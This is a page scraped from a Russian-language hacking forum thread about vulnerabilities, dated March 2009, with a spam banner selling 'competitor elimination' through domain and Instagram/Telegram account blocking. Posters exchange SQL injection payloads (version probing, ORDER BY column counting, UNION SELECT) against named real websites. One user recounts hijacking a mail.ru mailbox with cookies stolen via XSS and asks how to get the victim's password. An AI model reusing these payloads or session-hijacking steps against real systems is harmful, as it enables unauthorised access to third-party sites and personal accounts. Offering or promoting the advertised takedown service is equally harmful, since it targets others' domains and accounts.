УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 621 из 1393

621

Опции темы

Поиск в этой теме

Опции просмотра

#6201

26.03.2009, 21:14

InFlame

Участник форума

Регистрация: 27.10.2008

Сообщений: 215

Провел на форуме:
810079

Репутация: 90

Цитата:

Сообщение от Gorev

2 Gray_Wolf

.../srt.php?id=1+AND+(SUBSTRING((select+version()),1,1 ))>33..127

Можно ведь и проще:
.../srt.php?id=1+AND+SUBSTRING(version(),1,1)<5

#6202

26.03.2009, 21:54

led232

Новичок

Регистрация: 17.09.2008

Сообщений: 20

Провел на форуме:
142295

Репутация: 1

Прошу извенить если не туда запостил, вот какая проблема :
просмотрел видео на ачате как ломать майл.ру с помощью ксс http://video.antichat.org/file213.html..так вот там при получении кукис нужно подставлять их в оперу.кукис получил через сниф подставил в оперу все как надо.но при заходе на http://win.mail.ru/cgi-bin/start не логиниться а выбрасывает на страницу логаут.на которой в поле логин - логин вставляеться , а пароль нет, на месте пароля пустое окно.Подскажите плз что нужно сделать чтобы попасть в ак?

#6203

26.03.2009, 22:09

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

устарела сессия. Куки просрочены. Или криво в оперу вставил.

#6204

26.03.2009, 22:36

led232

Новичок

Регистрация: 17.09.2008

Сообщений: 20

Провел на форуме:
142295

Репутация: 1

Цитата:

Сообщение от попугай

устарела сессия. Куки просрочены. Или криво в оперу вставил.

да вы были правы!
только вот теперь встала другая делема:
я в ящик зашел , Но как терь пароль то узнать?
плиз сильно не пинайте, человек существо любопытное, все ему интересно, я делаю это первый раз ...
подскажите если не трудно возможно ли узнать пароль как то ?

#6205

27.03.2009, 00:32

M4g

Участник форума

Регистрация: 08.05.2007

Сообщений: 164

Провел на форуме:
466673

Репутация: 784

Отправить сообщение для M4g с помощью ICQ

>подскажите если не трудно возможно ли узнать пароль как то ?
нет

#6206

27.03.2009, 13:30

TELO

Познающий

Регистрация: 21.01.2009

Сообщений: 98

Провел на форуме:
227123

Репутация: 122

Отправить сообщение для TELO с помощью ICQ

пацаны,а как дальше?
http://www.hobby.net.ua/product_info.php?cPath=132&products_id=74266%27%20 order%20by%203/*

#6207

27.03.2009, 13:54

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Отправить сообщение для Pashkela с помощью ICQ

там нет скули. Просто нет

#6208

27.03.2009, 16:39

Naydav

Постоянный

Регистрация: 30.12.2006

Сообщений: 434

Провел на форуме:
849583

Репутация: 210

Вопрос по sql-injection

Вообщем есть скула, вида
http://site/551111', ошибка ессно не выводится

После некоторых манипуляций:
http://site/1111) -- -- comment
Ошибку не выдает, причем обязательно после двух "-- --"

Запрос вида
-1) OR id IN(5,6,7,8) ) ORDER BY id LIMIT 2-- -- comment
работает, поэтому смею предположить, что запрос однострочный, или это его последняя строка

Но вот дальше, не могу понять в чем дело

Запросы вида:
-1 ) GROUP by 1
-1 ) UNION SELECT 1
- не работают

cо вторым понятно, что скорее всего, в запросе стоит "SELECT * ", а не "SELECT `id`, ...", что вызывает ошибку different numbers of columns

Но как быть со вторым?
причем что
-1 ) GROUP by id
работает

И вот еще такое замечание
-1 ) ORDER BY 1 -- --
Работает, но любое другое значение отличное от единицы уже не работает, напр
-1 ) ORDER BY 2 -- --

запрос скорее всего с join-ами

прошу помочь советом

пс
Начинаю думать, что на станице 2 запроса, один для получения поля, для второго запроса, а второй непосредственно для отображения инфы

Последний раз редактировалось Naydav; 27.03.2009 в 17:33..

#6209

27.03.2009, 18:50

~~farex~~

Banned

Регистрация: 11.03.2009

Сообщений: 214

Провел на форуме:
914766

Репутация: 317

Цитата:

тут сайтец с скуль уязвимостью...

http://www.mediacomp.ru/?action=sub_kat&top_kat=-1,union+select+1/*

самое ссмешное то что я подобрал до 72 и нифига ничего не вылезло.... что предложите сделать ....?

Пример order+by

http://www.mediacomp.ru/?action=sub_kat&top_kat=1+order+by+1--
нет ошибки, полей больше одного.
htthttp://www.mediacomp.ru/?action=sub_kat&top_kat=1+order+by+100--
ошибка, полей меньше ста
http://www.mediacomp.ru/?action=sub_kat&top_kat=1+order+by+99--
нет ошибки, значит полей 99

Последний раз редактировалось farex; 27.03.2009 в 18:54..

#6210

27.03.2009, 19:21

Jokester

Members of Antichat - Level 5

Регистрация: 18.02.2008

Сообщений: 1,136

Провел на форуме:
17621293

Репутация: 4915

farex
Мухаха, слушай дружище, ты подвязывай с тяжёлыми наркотиками , а то я минуса буду ставить

Это цитата с этого поста :
http://forum.antichat.ru/showpost.php?p=433629&postcount=25

Это 3 страница топика, а мы сейчас на 622

Последний раз редактировалось jokester; 27.03.2009 в 19:23..

Страница 621 из 1393

621

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)

Быстрый переход